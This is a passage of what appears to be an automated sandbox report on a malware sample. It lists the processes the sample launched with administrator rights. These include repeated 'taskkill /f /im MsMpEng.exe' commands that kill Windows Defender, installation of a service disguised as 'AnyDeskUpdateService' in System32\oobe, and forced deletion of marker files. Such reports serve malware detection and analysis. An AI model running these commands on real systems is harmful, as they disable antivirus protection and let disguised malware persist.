                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:109
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:110
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:111
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:112
                                                                                                    Start time:20:26:34
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:113
                                                                                                    Start time:20:26:36
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:114
                                                                                                    Start time:20:26:36
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:115
                                                                                                    Start time:20:26:36
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff71dd80000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:116
                                                                                                    Start time:20:26:36
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:117
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:118
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:119
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:120
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:121
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:122
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:123
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:124
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:125
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:126
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:127
                                                                                                    Start time:20:26:37
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:128
                                                                                                    Start time:20:26:40
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:129
                                                                                                    Start time:20:26:40
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:130
                                                                                                    Start time:20:26:40
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:131
                                                                                                    Start time:20:26:40
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:132
                                                                                                    Start time:20:26:41
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:133
                                                                                                    Start time:20:26:41
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:134
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:135
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:136
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\oobe\AnyDeskUpdateService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
                                                                                                    Imagebase:0x7ff71dd80000
                                                                                                    File size:161'792 bytes
                                                                                                    MD5 hash:95408095927F78DEFFAEB9CB1F4CD44D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:137
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:138
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    Imagebase:0x7ff7403e0000
                                                                                                    File size:55'320 bytes
                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:139
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:140
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:141
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:142
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:143
                                                                                                    Start time:20:26:43
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start AnyDeskUpdateService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:144
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:145
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:146
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:147
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:148
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:149
                                                                                                    Start time:20:26:44
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff684ff0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:150
                                                                                                    Start time:20:26:47
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:151
                                                                                                    Start time:20:26:47
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:152
                                                                                                    Start time:20:26:47
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
                                                                                                    Imagebase:0x7ff61e120000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:153
                                                                                                    Start time:20:26:47
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff66e660000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:154
                                                                                                    Start time:20:26:47
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:taskkill /f /im MsMpEng.exe
                                                                                                    Imagebase:0x7ff6c7a10000
                                                                                                    File size:101'376 bytes
                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:157
                                                                                                    Start time:20:26:49
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:166
                                                                                                    Start time:20:26:50
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:168
                                                                                                    Start time:20:26:51
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:
                                                                                                    Has administrator privileges:
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:183
                                                                                                    Start time:20:26:56
                                                                                                    Start date:28/09/2024
                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                    Wow64 process (32bit):
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:
